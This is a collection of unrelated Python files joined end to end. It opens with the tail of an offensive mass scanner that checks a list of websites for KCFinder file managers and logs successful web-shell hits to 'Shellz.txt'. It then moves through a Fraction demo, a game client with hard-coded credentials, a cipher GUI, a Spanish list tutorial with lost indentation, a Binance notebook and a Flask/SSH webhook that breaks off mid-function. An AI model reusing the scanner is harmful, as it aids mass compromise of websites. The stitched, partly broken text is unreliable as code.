print(g+" - "+w+st+c+" ---> "+w+" Kcfinder-Shell "+g+"YES!"+w)
open("result/Shellz.txt","a").write(lib.url+"\n")
else:
open("result/kcfinder-path.txt","a").write(link+"browse.php\n")
print(g+" - "+w+st+c+" ---> "+w+" Kcfinder-Path "+g+"YES!"+w)
except Exception as e:
pass
break
else:
print(red+" - "+w+st+"/"+dork+c+" ---> "+w+"Kcfinder"+red+" NO!"+w)
except Exception as e:
pass
print(red+" - "+w+st+"/"+dork+c+" ---> "+w+"Kcfinder"+red+" NO!"+w)
site = input(green+" [+] Enter You Site List: "+la7mar)
th = input(green+" [+] How Many Speed: "+la7mar)
try:
opn = open(site,"r").readlines()
except:
print(la7mar+"\n\n [!] Failed To Open List")
quit()
try:
mkdir("result")
except:
pass
try:
with concurrent.futures.ThreadPoolExecutor(int(th)) as executor:
executor.map(scan,opn)
except Exception as e:
print(e)
print(green+" [+] All Site Scanned Successful [+]") |
from fractions import Fraction

# Demo of exact rational arithmetic with the stdlib Fraction type.
# FIX: converted Python 2 `print` statements to the print() function so the
# script runs under Python 3.
a = Fraction(5, 4)
b = Fraction(7, 16)
print(a + b)
print(a * b)
c = a * b
print(c.numerator)
print(c.denominator)
print(float(c))                 # exact rational rendered as a float
print(c.limit_denominator(8))   # closest fraction with denominator <= 8
x = 3.75
# as_integer_ratio() gives the float's exact (numerator, denominator) pair.
y = Fraction(*x.as_integer_ratio())
print(y)
from clientpy3 import *
import time
import random
import math
def status_parser(status):
    """Parse a raw STATUS message string into a dict of game-state fields.

    All extracted values are kept as strings, exactly as they appear in
    the message.  Returns None for an empty message.
    """
    try:
        status[0]                     # bail out on an empty message
    except (IndexError):
        return
    fields = status.split(' ')
    # print(fields)
    parsed = {}
    parsed['position'] = (fields[1], fields[2])
    parsed['velocity'] = (fields[3], fields[4])
    mine_count = int(fields[7])
    parsed['num_mines'] = mine_count
    # Each mine occupies 3 consecutive tokens after the count.
    parsed['mines'] = [fields[8 + 3 * m:11 + 3 * m] for m in range(mine_count)]
    player_base = 9 + 3 * mine_count
    player_count = int(fields[player_base])
    parsed['num_players'] = player_count
    # Each player occupies 4 consecutive tokens after the count.
    parsed['players'] = [fields[player_base + 4 * p + 1:player_base + 4 * p + 5]
                         for p in range(player_count)]
    bomb_base = player_base + 4 * player_count + 2
    bomb_count = int(fields[bomb_base])
    parsed['num_bombs'] = bomb_count
    parsed['bombs'] = [fields[bomb_base + 3 * b + 1:bomb_base + 3 * b + 4]
                       for b in range(bomb_count)]
    worm_base = bomb_base + 3 * bomb_count + 2
    worm_count = int(fields[worm_base])
    parsed['num_wormholes'] = worm_count
    # Wormholes are 5 tokens wide.
    parsed['wormholes'] = [fields[worm_base + 5 * w + 1:worm_base + 5 * w + 6]
                           for w in range(worm_count)]
    return parsed
def config_parser(config):
    """Parse the server CONFIG reply (a one-element list) into a dict of
    float-valued settings.  Returns None for an empty reply.
    """
    try:
        raw = config[0]
    except (IndexError):
        return
    parts = raw.split(' ')
    # Values sit at even offsets 2, 4, ..., 24; names precede each value.
    keys = ('MAP_WIDTH', 'MAP_HEIGHT', 'CAPTURERADIUS', 'VISIONRADIUS',
            'FRICTION', 'BRAKEFRICTION', 'BOMBPLACERADIUS',
            'BOMBEFFECTRADIUS', 'BOMBDELAY', 'BOMBPOWER',
            'SCANRADIUS', 'SCANDELAY')
    return {key: float(parts[2 * (i + 1)]) for i, key in enumerate(keys)}
def scan_parser(scan_data):
    """Parse a SCAN reply into mines/players/bombs/wormholes.

    Returns None for an empty reply or the rate-limit error message.
    Values are kept as strings, exactly as received.
    """
    if (scan_data == ['ERROR Scanning too soon']):
        return
    try:
        raw = scan_data[0]
    except (IndexError):
        return
    fields = raw.split(' ')
    result = {}
    # print(fields)
    mine_count = int(fields[3])
    # Each mine spans 3 tokens after the count.
    result['mines'] = [fields[4 + 3 * m:7 + 3 * m] for m in range(mine_count)]
    player_base = 5 + 3 * mine_count
    player_count = int(fields[player_base])
    result['num_players'] = player_count
    result['players'] = [fields[player_base + 4 * p + 1:player_base + 4 * p + 5]
                         for p in range(player_count)]
    bomb_base = player_base + 4 * player_count + 2
    bomb_count = int(fields[bomb_base])
    result['num_bombs'] = bomb_count
    result['bombs'] = [fields[bomb_base + 3 * b + 1:bomb_base + 3 * b + 4]
                       for b in range(bomb_count)]
    worm_base = bomb_base + 3 * bomb_count + 2
    worm_count = int(fields[worm_base])
    result['num_wormholes'] = worm_count
    result['wormholes'] = [fields[worm_base + 5 * w + 1:worm_base + 5 * w + 6]
                           for w in range(worm_count)]
    return result
def status(user, password):
    """Fetch the current game status for a player and return it parsed.

    Returns None when the server reply is empty or times out.
    """
    try:
        reply = get_status(user, password)
        return status_parser(reply[0])
    except (IndexError, TimeoutError):
        return
def move(user, password, angle, velocity):
    """Send an ACCELERATE command with the given heading and speed."""
    command = ' '.join(['ACCELERATE', str(angle), str(velocity)])
    run(user, password, command)
    return
def brake(user, password):
    """Send a BRAKE command for the given player."""
    run(user, password, 'BRAKE')
    return
def scan(user, password, data, dic):
    """Request a scan of a random map location.

    FIX: this block contained unresolved git merge-conflict markers
    (<<<<<<< / ======= / >>>>>>>), which is a SyntaxError.  The HEAD
    variant (random scan target) is kept: the discarded branch aimed the
    scan ahead of the player's motion but relied on an undefined
    ``utils`` module and hard-coded credentials.

    data: parsed status dict (position is read but currently unused).
    dic:  parsed config dict; only MAP_WIDTH is used.
    """
    user_x = data['position'][0]
    user_y = data['position'][1]
    randx = random.randint(0, dic['MAP_WIDTH'])
    randy = random.randint(0, dic['MAP_WIDTH'])
    # Wrap into map bounds.  NOTE(review): both axes use MAP_WIDTH --
    # confirm MAP_HEIGHT was not intended for the y coordinate.
    scan_x = str(math.floor((randx) % dic['MAP_WIDTH']))
    scan_y = str(math.floor((randy) % dic['MAP_WIDTH']))
    # print('scanning: ', scan_x, scan_y)
    return get_scan(user, password, scan_x, scan_y)

if __name__ == '__main__':
    u = 'BSOD'
    p = 'Alboucai'
    # Simple demo loop: accelerate, print status, repeat.
    while True:
        move(u, p, 3.14/2, 0.25+0.25)
        print(status(u, p))
        time.sleep(2)
|
#!/usr/bin/python
import sys
from PyQt5 import QtCore, QtGui, QtWidgets,uic
from sympy import mod_inverse #for optimized mod_inverse
import sys
#Import code generated by pyqt5 designer
#pyuic5 *.ui -o *.py
from Ciphers import Ui_MainWindow
class Ui(QtWidgets.QMainWindow):
    """Main window of the cipher tool.

    Wires the Qt Designer widgets (Ui_MainWindow) to the cipher
    implementations below.  The output field is re-encrypted live whenever
    the plaintext, key, cipher selection, or encrypt/decrypt toggle
    changes.
    """
    global firstRun # Described where I use it
    # True until the log file has been created once (see Btn()).
    firstRun = True
    def __init__(self):
        #Initiates the UI designed in Qt5 Designer
        super(Ui, self).__init__()
        self.ui = Ui_MainWindow()
        self.ui.setupUi(self)
        self.show()
        # Change the text in the CipherText Field when PlainText/Key/Encryption Mode is changed
        self.ui.codewordInput.textChanged.connect(self.Encrypt)
        self.ui.keyInput.textChanged.connect(self.Encrypt)
        self.ui.decryptBool.toggled.connect(self.Encrypt)
        self.ui.encryptionCipher.currentIndexChanged.connect(self.Encrypt)
        # Initates the log and moves the CipherText to the PlainText field
        self.ui.encodeButton.clicked.connect(self.Btn)
    def Btn(self):
        """Log the current operation and feed the ciphertext back in as the
        next plaintext, optionally copying it to the system clipboard."""
        global firstRun
        word = self.ui.codewordInput.toPlainText() #Gets PlainText as a String
        key = self.ui.keyInput.toPlainText() #Gets Key as a String
        encryptionType = str(self.ui.encryptionCipher.currentText()) #Gets Encryption Type as a String
        output = self.ui.outputInput.toPlainText() #Gets CipherText as a String
        if firstRun:
            #Creates or overwrites old Log if the button was pressed for the first time
            log = open("log.txt","w+",encoding='utf-8')
            log.write('Codeword:'+str(word)+' Cipher:'+str(encryptionType)+' Key :\''+str(key)+'\' ---> \''+str(output)+'\'')
            firstRun = False
        else:
            # Adds the next sequential cipher to the Log
            log = open("log.txt","a",encoding='utf-8')
            log.write(('------> Cipher:'+str(encryptionType)+' Key\'' +str(key)+'\' ---> \''+str(output)+'\''))
        log.close()
        self.ui.codewordInput.setText(output)
        self.Encrypt()
        #Copies the output to system clipboard if the user want to
        if self.ui.copyBool.isChecked():
            #stolen from stackoverflow.com/questions/1073550/pyqt-clipboard-doesnt-copy-to-system-clipboard
            clipboard = QtWidgets.QApplication.clipboard()
            clipboard.setText(output)
            event = QtCore.QEvent(QtCore.QEvent.Clipboard)
            # NOTE(review): relies on the module-level `app` created at the
            # bottom of this file.
            app.sendEvent(clipboard, event)
    def Encrypt(self):
        """Dispatch to the cipher selected in the combo box and display the
        result.  When the key is invalid for the selected cipher, the
        output field is simply left unchanged."""
        word = self.ui.codewordInput.toPlainText()
        key = self.ui.keyInput.toPlainText()
        EncryptMode = False if self.ui.decryptBool.isChecked() else True #Check if the user want to encrypt or decrypt
        if self.ui.encryptionCipher.currentIndex() == 0 and key.isnumeric(): #Index 0 is Ceaser shift
            output = self.ceaserShift(word,key,EncryptMode)
            self.ui.outputInput.setText(output)
        elif self.ui.encryptionCipher.currentIndex() == 1 and key.isalpha(): #Index 1 is Vigenere Cipher
            output = self.Vigenere(key,EncryptMode)
            self.ui.outputInput.setText(output)
        elif self.ui.encryptionCipher.currentIndex() == 2 and key.isnumeric(): #Index 2 is Multiplicative Cipher
            output = self.Multipicative(word,key,EncryptMode)
            self.ui.outputInput.setText(output)
        elif self.ui.encryptionCipher.currentIndex() == 3 and key != '': #Index 3 is Affine Cipher
            try: # A little hacky coding
                mulKey,addKey = tuple(key.split(","))
                output = self.Affine(word,mulKey,addKey,EncryptMode)
                self.ui.outputInput.setText(output)
            except:
                print('INVALID FORMAT')
        elif self.ui.encryptionCipher.currentIndex() == 4 and key != '': #Index 4 is Rail Fence Cipher
            output = self.railFence(word,key,EncryptMode)
            self.ui.outputInput.setText(output)
    def storeCase(self,Word):
        #Just returns a List containing the original case of PlainText
        Lst = []
        for i in range(len(Word)):
            if Word[i].isupper():
                Lst.append(True)
            else:
                Lst.append(False)
        return Lst
    def restoreCase(self,Word,codeCase):
        #Restores the case of the CipherText
        newWord = ""
        for i in range(len(Word)):
            if codeCase[i]:
                newWord =newWord + Word[i].upper()
            else:
                newWord =newWord + Word[i]
        return(newWord)
    def ceaserShift(self,word,key,EncryptMode):
        """Caesar shift by int(key); decryption shifts backwards.  Case is
        preserved and non-alphabetic characters pass through unchanged."""
        key = int(key) if EncryptMode else -int(key) # Key is subtracted while Decrypting
        codeCase = self.storeCase(word)
        word = word.lower()
        outputASCII = [] #Empty list to store the positional values of characters
        for letter in word:
            if letter.isalpha():
                outputASCII.append(ord(letter)-97) #Since the plaintext is in lowercase we just subtract 97 which is the ordinal value of 'a'
            else:
                outputASCII.append(ord(letter)) #Special Characters are ignored
        for i in range(len(outputASCII)):
            if outputASCII[i] < 0 or outputASCII[i] > 25: #Special Characters are ignored
                continue
            outputASCII[i] = (outputASCII[i] + int(key))%26 + 97
            # NOTE(review): Python's % always yields a non-negative result
            # here, so this branch appears unreachable.
            if outputASCII[i] < 0: # Can happen during decryption
                outputASCII[i] = 26 - outputASCII[i] + 97
        Output =''.join(chr(i) for i in outputASCII) #Essentially the same as Output = Output + chr(i) inside a for loop, but faster and easier to understand
        Output = self.restoreCase(Output,codeCase)
        return Output
    def Vigenere(self,key,EncryptMode):
        """Vigenere cipher; re-reads the plaintext from the UI field.

        NOTE(review): encryption offsets the key index by the number of
        non-letter characters seen so far (key[i-Blanks]), but decryption
        uses key[i] -- round-tripping text containing spaces likely
        fails; confirm and align the two branches.
        """
        word = self.ui.codewordInput.toPlainText()
        codeCase = self.storeCase(word)
        word = word.lower()
        key = key.lower()
        output = ""
        Blanks = 0
        while(len(key)<len(word)): #We just need the key to be longer than the plaintext
            key = key + key
        for i in range(len(word)):
            if word[i].isalpha():
                if EncryptMode:
                    ciph = (ord(word[i])+ord(key[i-Blanks])-194)%26 # 97+97 = 194
                else:
                    ciph = ((ord(word[i]) - ord(key[i]) + 26) % 26)
                output = output + chr(ciph+97)
            else:
                output += word[i]
                Blanks = Blanks + 1
        output = self.restoreCase(output,codeCase)
        return output
    def Multipicative(self,word,key,EncryptMode):
        # Just breaks when mod inverse doesn't exist
        # NOTE(review): 'EncryptMode == 1' relies on True == 1; it works,
        # but a plain 'if EncryptMode' would be clearer.
        key = int(key) if EncryptMode == 1 else mod_inverse(int(key),26)
        codeCase = self.storeCase(word)
        word = word.lower()
        outputASCII = []
        for letter in word:
            if letter.isalpha():
                outputASCII.append(ord(letter)-97)
            else:
                outputASCII.append(ord(letter))
        for i in range(len(outputASCII)):
            if outputASCII[i] < 0 or outputASCII[i] > 25:
                continue
            try:
                outputASCII[i] = int((outputASCII[i] * int(key))%26) + 97
            except:
                return 'Key doesn\'t have a mod inverse'
        output =''.join(chr(i) for i in outputASCII)
        output = self.restoreCase(output,codeCase)
        return output
    def Affine(self,word,mulKey,addKey,EncryptMode):
        # Just breaks when mod inverse doesn't exist
        # Affine cipher: E(x) = (mulKey*x + addKey) mod 26;
        # D(y) = mod_inverse(mulKey, 26) * (y - addKey) mod 26.
        codeCase = self.storeCase(word)
        word = word.lower()
        outputASCII = []
        mulKey = int(mulKey)
        addKey = int(addKey)
        for letter in word:
            if letter.isalpha():
                outputASCII.append(ord(letter)-97)
            else:
                outputASCII.append(ord(letter))
        for i in range(len(outputASCII)):
            if outputASCII[i] < 0 or outputASCII[i] > 25:
                continue
            if EncryptMode:
                outputASCII[i] = ((outputASCII[i] * int(mulKey))+addKey)%26 + 97
            else:
                try:
                    outputASCII[i] = ((outputASCII[i] - addKey) * int((mod_inverse(mulKey,26))))%26 + 97
                except:
                    return 'Key doesn\'t have a mod inverse'
        output =''.join(chr(i) for i in outputASCII)
        output = self.restoreCase(output,codeCase)
        return output
    def railFence(self,word,key,EncryptMode):
        #Adapted from https://www.geeksforgeeks.org/rail-fence-cipher-encryption-decryption/
        # NOTE(review): the decryption branch never resets row/col to 0,0
        # before the final read-off loop, so rail[row][col] starts with
        # col == len(word); this looks like it raises IndexError -- confirm
        # against the geeksforgeeks original, which resets both.
        key = int(key)
        rail = [['' for i in range(len(word))] for ii in range(key)] #initate empty Grid
        dirDown = False
        row, col = 0, 0
        output = []
        index = 0
        if EncryptMode:
            # Walk the zig-zag, writing each character into its rail cell.
            for i in range(len(word)):
                if (row == 0) or (row == key - 1):
                    dirDown = not dirDown
                rail[row][col] = word[i]
                col += 1
                if dirDown:
                    row += 1
                else:
                    row -= 1
            output = []
            # Read the grid row by row to produce the ciphertext.
            for i in range(key):
                for j in range(len(word)):
                    if rail[i][j] != '':
                        output.append(rail[i][j])
            return("" . join(output))
        else:
            # Phase 1: mark the zig-zag path with '*'.
            for i in range(len(word)):
                if row == 0:
                    dirDown = True
                if row == key - 1:
                    dirDown = False
                rail[row][col] = '*'
                col += 1
                if dirDown:
                    row += 1
                else:
                    row -= 1
            # Phase 2: fill the marked cells with the ciphertext, row-major.
            for i in range(key):
                for j in range(len(word)):
                    if (rail[i][j] == '*' and index < len(word)):
                        rail[i][j] = word[index]
                        index += 1
            # Phase 3: walk the zig-zag again, collecting the plaintext.
            for i in range(len(word)):
                if row == 0:
                    dirDown = True
                if row == key-1:
                    dirDown = False
                if (rail[row][col] != '*'):
                    output.append(rail[row][col])
                col += 1
                if dirDown:
                    row += 1
                else:
                    row -= 1
            return("".join(output))
#to make the PyQt5 window
# Application bootstrap: create the Qt application, instantiate the main
# window (which shows itself in __init__), and enter the event loop.
app = QtWidgets.QApplication(sys.argv)
window = Ui()
app.exec_()
def joke():
    """Return a one-line kleptomaniac pun."""
    setup = u"I'm fed up with kleptomaniacs... "
    punchline = u'They take everything literally'
    return setup + punchline
|
#REPASO DE CONCEPTOS BÁSICOS
'''
numeros = [1, 2, 3, 4, 5]
print(numeros)
primera_posicion = numeros[0]
longitud = len(numeros)
print(f"El primer valor es: {primera_posicion}\nLa longitud de la lista es: {longitud}")
#ITERAR SOBRE UNA LISTA
for num in numeros:
print(num)
'''
'''
#INDEXADO Y SUBLISTAS
lista = ["El", "futur", "rei", "dels", "piratas"]
print(lista)
ultima_posicion = lista[-1]
print(ultima_posicion)
penultima_posicion = lista[-2]
print(penultima_posicion)
sublista = lista[1:5] #paramos en 5-1 = 4
print(sublista)
sublista = lista[:5]
print(sublista)
sublista = lista[1:]
print(sublista)
sublista = lista[-4:-1]
print(sublista)
'''
'''
#COMPROVAR SI UNA LISTA CONTIENE O NO UN ELEMENTO
lista = ["El", "futur", "rei", "dels", "piratas"]
palabra = "rei"
palabra_dos = "barbablanca"
if palabra in lista:
print(f"La palabra '{palabra}' pertenece a la lista")
if palabra_dos not in lista:
print(f"La palabra '{palabra_dos}' no está en la lista")
'''
'''
#MODIFICAR ELEMENTOS DE UNA LISTA
lenguajes = ["Python", "JavaScript", "C", "Java", "Kotlin", "Ruby", "SQL"]
print(lenguajes)
lenguajes[3] = "Angular"
print(lenguajes)
lenguajes[2] = lenguajes[2] + "++"
print(lenguajes)
lenguajes[2:4] = ["C#", "Laravel"]
print(lenguajes)
lenguajes[4:5] = ["PHP", "React", "Vue"]
print(lenguajes)
'''
'''
#METODOS DE LISTAS: AÑADIR ELEMENTOS
lenguajes = ["Python", "JavaScript", "C", "Java", "Kotlin", "Ruby", "SQL"]
print(lenguajes)
#INSERT()
lenguajes.insert(1, "C++")
print(lenguajes)
#APPEND()
lenguajes.append("C#") #agrega alfinal de la lista
print(lenguajes)
#EXTEND()
frutas = ["Fresa", "Peras", "Uvas"]
print(frutas)
frutas_extra = ["Mango", "Manzana", "Platano"]
frutas.extend(frutas_extra)
print(frutas)
print(frutas_extra)
'''
'''
#METODOS DE LISTAS: ELIMINAR ELEMENTOS
frutas = ["Mango", "Manzana", "Plátano", "Kiwi", "Melocotón", "Cereza"]
print(frutas)
#POP() -> me elimina y retorna el elemento eliminado
frutas.pop() #si no le paso ningun indice, me elimina el ultimo elemento
print(frutas)
frutaEliminada = frutas.pop(0)
print(frutas)
print(frutaEliminada)
#REMOVE()
frutas.remove("Melocotón")
print(frutas)
#DEL
del frutas[0]
print(frutas)
indice = frutas.index("Plátano")
print(indice)
'''
'''
#CONVERTIR UN TEXTO EN LISTA
texto = "Hola que tal"
lista_palabras = (texto.split())
print(lista_palabras)
'''
'''
ENUNCIADO: TENEMOS UN TEXTO DÓNDE QUEREMOS ENCONTRAR PALABRAS CLAVE.
LAS PALABRAS CLAVE PUEDEN SER HASTA 5 Y DEBEREMOS PEDÍRSELAS AL USUARIO
Y GUARDARLAS EN UNA LISTA. SI EL USUARIO QUIERE PONER MENOS DE 5 PALABRAS CLAVE,
EBERÁ ESCRIBIR "FIN" PARA TERMINAR DE INTRODUCIR DATOS. SI EL USUARIO INTRODUCE
NÚMEROS O NADA, DEBEREMOS ELIMINARLOS DE LA LISTA ANTES DE LA BÚSQUEDA.
EN OTRA LISTA, DEBEREMOS GUARDAR EL NÚMERO DE VECES QUE APARECE CADA
PALABRA CLAVE EN NUESTRO TEXTO. POR EJEMPLO, SI LAS PALABRAS CLAVE SON
ORDENADOR Y PORTÁTIL Y APARECEN 5 Y 7 VECES RESPECTIVAMENTE, NUESTRAS LISTAS
DEBERÍAN SER ASÍ:
- KEYWORDS = ["ORDENADOR", "PORTÁTIL"]
- OCURRENCIAS = [5, 7]
'''
texto = """"Seguramente hayas notado que tu productividad ha bajado desde que trabajas desde casa.
Es muy importante que logremos teletrabajar efectivamente y de manera autorregulada.
Esto se traduce en finalizar antes nuestras tareas y evitar jornadas laborales interminables.
El primer consejo y uno de los más importantes ya te lo he dado en el apartado anterior.
Tenemos que construir un espacio de trabajo en el que nos sintamos cómodos y dispongamos de todas las herramientas necesarias para teletrabajar.
En la medida de lo posible, es importante teletrabajar siempre en el mismo lugar.
De esta forma, nuestro cerebro asocia el sitio con la acción de trabajar y nos hará estar más focalizados en nuestras tareas."""
keywords = []
keywords_repeat = []
for x in range(5):
keyword = input("Introduce una palabra clave o 'fin' para terminar: ")
if keyword == 'fin':
break
else:
keywords.append(keyword)
print(keywords)
posicion = 0
while(True):
if posicion >= len(keywords):
break
if keywords[posicion] == '': #EMPTY
keywords.pop(posicion)
elif keywords[posicion].isnumeric():
keywords.pop(posicion)
else:
posicion +=1
print("Lista de keywords corregida")
print(keywords)
texto = texto.replace('.', '').replace(',', '').split()
longitud_keywords = len(keywords)
for x in range(longitud_keywords):
keywords_repeat.append(0)
for palabra in texto:
for keyword in keywords:
if keyword == palabra:
pos = keywords.index(keyword)
keywords_repeat[pos] += 1
break
print(keywords_repeat) |
'''
输出九九乘法表
'''
def lower_triangle():
    """Print the 9x9 multiplication table as a lower triangle.

    Each cell is "row*col=product"; cells are tab-separated and every
    line ends with a trailing tab.
    """
    for row in range(1, 10):
        cells = ["%d*%d=%d" % (row, col, row * col) for col in range(1, row + 1)]
        print("\t".join(cells) + "\t")
def upper_triangle():
    """Print the 9x9 multiplication table as an upper (right-shifted) triangle.

    Row *r* is indented by r-1 tabs and lists "r*c=product" for c = r..9,
    tab-separated with a trailing tab.
    """
    for row in range(1, 10):
        indent = "\t" * (row - 1)
        cells = ["%d*%d=%d" % (row, col, row * col) for col in range(row, 10)]
        print(indent + "\t".join(cells) + "\t")
if __name__=="__main__": #程序主入口
upper_triangle()
#lower_triangle() |
# Notebook-style exploration of the Binance REST API: tickers, order-book
# depth, and daily BTCUSDT candles rendered with mplfinance.
import pandas as pd
from binance import Client, ThreadedWebsocketManager, ThreadedDepthCacheManager
import sys
# Make the local config module (API credentials) importable.
sys.path.insert(1, '/home/marcon/Documents/exchange/')
import config
# Authenticate
client = Client(config.API_KEY, config.API_SECRET)
# Get Tickers
tickers = client.get_all_tickers()
ticker_df = pd.DataFrame(tickers)
ticker_df.set_index('symbol', inplace=True)
# Exploratory calls below return values that are discarded when run as a
# script (they only display output in a notebook/REPL).
ticker_df.head()
ticker_df.tail()
ticker_df.loc['BTCUSDT']
# Market Depth
depth = client.get_order_book(symbol='BTCUSDT')
depth_df = pd.DataFrame(depth['bids'])
depth_df.columns = ['Price', 'Volume']
depth_df.head()
# Get Historical Data
historical = client.get_historical_klines('BTCUSDT',Client.KLINE_INTERVAL_1DAY, '1 Jan 2011')
historical
hist_df = pd.DataFrame(historical)
hist_df.columns = ['Open Time','Open','High','Low','Close','Volume','Close Time','Quote Asset Volume',
                   'Number of Trades','TB Base Volume','TB Quote Volume','Ignore']
hist_df.head()
# Preprocess Historical Data
hist_df.dtypes
# Timestamps are divided by 1000 before unit='s' conversion, i.e. treated
# as milliseconds.
hist_df['Open Time'] = pd.to_datetime(hist_df['Open Time']/1000, unit = 's')
hist_df['Close Time'] = pd.to_datetime(hist_df['Close Time']/1000, unit = 's')
numeric_columns = ['Open','High','Low','Close','Volume','Quote Asset Volume','TB Base Volume','TB Quote Volume']
hist_df[numeric_columns] = hist_df[numeric_columns].apply(pd.to_numeric, axis=1)
hist_df.head()
hist_df.tail()
hist_df.describe()
hist_df.info()
# Viz
import mplfinance as mpf
mpf.plot(hist_df.set_index('Close Time').tail(100))
mpf.plot(hist_df.set_index('Close Time').tail(100), type = 'candle',style='charles')
mpf.plot(hist_df.set_index('Close Time').tail(100), type = 'candle',style='charles',volume=True)
mpf.plot(hist_df.set_index('Close Time').tail(120), type = 'candle',style='charles',volume=True,
         title = 'BTCUSDT Last 120 Days', mav = (10,20,30))
|
from flask import Flask, request, make_response
import logging
from logging.handlers import RotatingFileHandler
import paramiko
from config import Config
import requests
import os
# Absolute directory of this file; all relative paths below anchor here.
BASEPATH = os.path.abspath(os.path.dirname(__file__))
print('BASE', BASEPATH)
def check_dir(dir):
    """Ensure a directory (or each directory in a list) exists under BASEPATH.

    Accepts a relative directory name or a list of them.  Returns True
    when every directory exists or was created, False on any failure or
    unsupported argument type.
    """
    print('check_dir:', dir)
    if not dir:
        return False
    if isinstance(dir, list):
        print('is list', dir)
        outcome = False
        # Stop at the first failure; the last outcome is returned.
        for entry in dir:
            outcome = check_dir(entry)
            if not outcome:
                break
        return outcome
    if isinstance(dir, str):
        print('is string', dir)
        target = ''.join([BASEPATH, '/', dir])
        try:
            if not os.path.exists(target):
                os.mkdir(target)
        except BaseException as exp:
            print('error create file:', exp)
            return False
        return True
    # Anything other than a non-empty str or list is rejected.
    return False
# Create the runtime directory layout before logging/config are wired up.
dirs = ['config', 'keys', 'logs']
check_dir(dirs)
# Root logger writes everything at DEBUG into logs/wh.log...
strfmt = '%(asctime)s %(thread)d %(name)s [%(levelname)s] %(funcName)s: %(message)s'
logging.basicConfig(filename=f'{BASEPATH}/logs/wh.log', level=logging.DEBUG, format=strfmt)
# ...plus a size-capped rotating handler attached to the Flask app logger.
handler = RotatingFileHandler(f'{BASEPATH}/logs/wh.log', maxBytes=10000000, backupCount=1)
handler.setLevel(logging.DEBUG)
# Shared SSH client; unknown host keys are accepted automatically.
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(
    paramiko.AutoAddPolicy())
app = Flask(__name__)
app.logger.addHandler(handler)
def readconfig():
    """Load the webhook configuration and normalise the SSH port.

    Returns the mapping produced by Config(BASEPATH).get_config(), with
    'port' defaulted to 22 when it is missing/empty.

    FIX: removed the hard-coded default dict that was built and then
    immediately overwritten (dead, misleading code).
    """
    config = Config(BASEPATH).get_config()
    # An empty/zero port means "use the SSH default".
    if not config['port']:
        config['port'] = 22
    return config
# Load the config once at import time and pre-load the private key it names.
config = readconfig()
app.logger.info(config)
ssh_key = paramiko.RSAKey.from_private_key_file(f"{BASEPATH}/keys/{config['sshkey']}")
@app.route('/')
def hello_world():
    # Simple liveness endpoint; logs each hit.
    app.logger.info('hello_world page')
    return 'Hello World!'
def create_ticket(data):
    """Create a Zammad ticket from an alert payload.

    :param data: alert dict; must carry 'state', and for alerting states
                 also 'title' and 'message'.
    :return: False for non-alerting states, otherwise a dict with
             'message' (HTML error text or '') and 'code' (HTTP status).

    Zammad API shape:
    POST /api/v1/tickets
    {
        "title": "Help me!",
        "group": "Users",
        "customer": "email_of_existing_customer@example.com",
        "article": {
            "subject": "some subject",
            "body": "some message",
            "type": "note",
            "internal": false
        },
        "note": "some note"
    }

    FIX: the old exception clauses caught the *builtin* ConnectionError /
    TimeoutError (which requests does not raise) and ended with the
    invalid ``except request.ro`` -- itself an AttributeError.  They are
    replaced with the requests.exceptions hierarchy.
    """
    # Only open tickets for alerts that are actually firing.
    if data['state'].lower() != 'alerting':
        return False
    query = f"{Config().get_url(config)}api/v1/tickets"
    create_json = {
        "title": data['title'][:40],        # Zammad title kept short
        "group": "Users",
        "customer": config['zammad']['customer_email'],
        "state_id": 1,
        "article": {
            "subject": data['title'][:40],
            "body": data['message'],
            "type": "note",
            "internal": False,
            "sender": "Customer",
        },
        "note": data['message']}
    print('URL:', query)
    print(create_json)
    # Authorization: Token token=
    headers = {
        'Authorization': f"Token token={config['zammad']['token']}"
    }
    print(headers)
    text = ''
    try:
        responce = requests.post(query, headers=headers, json=create_json)
        app.logger.info(f'result create ticket: {responce.status_code}')
        if responce.status_code >= 400:
            text = f'<h2>{responce.status_code} Error</h2>'
    except requests.exceptions.ConnectionError as exp:
        app.logger.error(f'Connection error: {exp}')
        return {'message': '502 Server Connection Error', 'code': 502}
    except requests.exceptions.Timeout as exp:
        app.logger.error(f'Timeout error: {exp}')
        return {'message': '408 Request Timeout Error', 'code': 408}
    except requests.exceptions.RequestException as exp:
        app.logger.error(f'BaseException error: {exp}')
        return {'message': '500 Server Error', 'code': 500}
    return {'message': text, 'code': responce.status_code}
@app.route('/catchwh/<string:script>', methods=['GET'])
def catchwhget(script):
    """GET variant with the script name embedded in the URL path."""
    app.logger.info(script)
    result = call_script(script)
    return result
@app.route('/catchwh/', methods=['POST', 'GET'])
def catchwh():
    """Webhook entry point.

    POST: accepts either JSON (Grafana-style; script name under
    tags['script']) or form data.  Runs the named script when present,
    otherwise tries to open a ticket from the alert payload.
    GET: runs the script named in the ?script= query argument.

    FIX: previously `result` stayed an empty dict on a GET without a
    ?script= argument (KeyError on result['message']), and a POST whose
    create_ticket() returned False crashed the same way.  A 400 default
    response now covers both paths.
    """
    app.logger.info(f"method: {request.method}")
    # Default response when no script/ticket action applies.
    result = {'message': 'no action', 'code': 400}
    if request.method == 'POST':
        script = None
        data = None
        if request.is_json:
            data = request.get_json()
            app.logger.info(str(data))
            if 'tags' in data and 'script' in data['tags']:
                script = data['tags']['script']
        else:
            script = request.form.get('script')
            data = request.form.to_dict()
        if script:
            app.logger.info(f"get via POST: {script}")
            result = call_script(script)
        else:
            ticket = create_ticket(data)
            # create_ticket returns False for non-alerting states; keep
            # the 400 default in that case.
            if ticket:
                result = ticket
    else:
        script = request.args.get('script')
        app.logger.info(f"args: {request.args}, {script}")
        if script:
            app.logger.info(f"get via GET: {script}")
            result = call_script(script)
    response = make_response(result['message'], int(result['code']))
    response.headers["Content-Type"] = "application/json"
    return response
def check_errors(stdout, stderr):
    """Convert ssh exec output streams into a {'code','message'} response.

    :param stdout: iterable of output lines, or an int sentinel (555)
                   left in place when the SSH connection failed.
    :param stderr: iterable of error lines, or the same int sentinel.
    :return: dict with 'code' (200 only when stdout is exactly 'OK',
             else 500) and 'message'.

    FIX: the int-sentinel path returned {'result', 'error'} keys while
    every caller reads result['message'] / result['code'] -- a KeyError
    whenever the SSH connection had failed.
    """
    out = ''
    error = ''
    error_code = 500
    len_out = 0
    len_err = 0
    if isinstance(stdout, int) or isinstance(stderr, int):
        return dict(code=error_code, message='Exec exception')
    for line in stdout:
        out += line.strip('\n')
        len_out = 1
    for line in stderr:
        error += line.strip('\n')
        len_err = 1
    if len_out > 0:
        app.logger.info(f'OUT: {out}')
        # A bare 'OK' from the remote script means success.
